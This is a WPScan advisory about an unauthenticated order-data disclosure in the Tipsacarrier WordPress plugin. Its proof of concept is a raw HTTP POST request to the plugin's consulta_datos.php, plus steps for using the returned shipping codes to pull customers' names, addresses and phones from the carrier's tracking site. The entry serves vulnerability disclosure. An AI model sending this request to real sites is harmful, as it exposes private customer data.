WordPress Plugin Vulnerabilities
Tipsacarrier < 1.5.0.5 - Unauthenticated Orders Disclosure
Description
The plugin does not have any authorisation check in place some functions, which could allow unauthenticated users to access Orders data which could be used to retrieve the client full address, name and phone via tracking URL
Vendor was notified on November 26th, 2021, did not reply nor fix the issue
Proof of Concept
POST /wp-content/plugins/tipsacarrier/js/consulta_datos.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 59 Connection: close Upgrade-Insecure-Requests: 1 page=1&rows=5000&sidx=id_envio_order&sord=DESC&_search=true The response includes the same data that only an administrator in the plugin page can see. Including: - The [orderid] number. - [creation date] for the order. - The [shipping agency order code] which you can use at the agency website tracking URL: https://dinapaqweb.tipsa-dinapaq.com/dinapaqweb/detalle_envio.php?servicio=[shipping agency order code]&fecha=[creation date in dd/mm/YYYY format] to retrieve client full address, full name, phone, and other data. - The order shipping status [shipping agency status]. - An URL where you can download the printing tag accessing to [printing tag url] with no authentication, located in /wp-content/uploads.
Affects Plugins
Fixed in 1.5.0.5 References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
José Aguilera
Submitter
José Aguilera
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-04-05 (about 2 years ago)
Added
2022-04-05 (about 2 years ago)
Last Updated
2022-09-06 (about 1 years ago)
WPScan 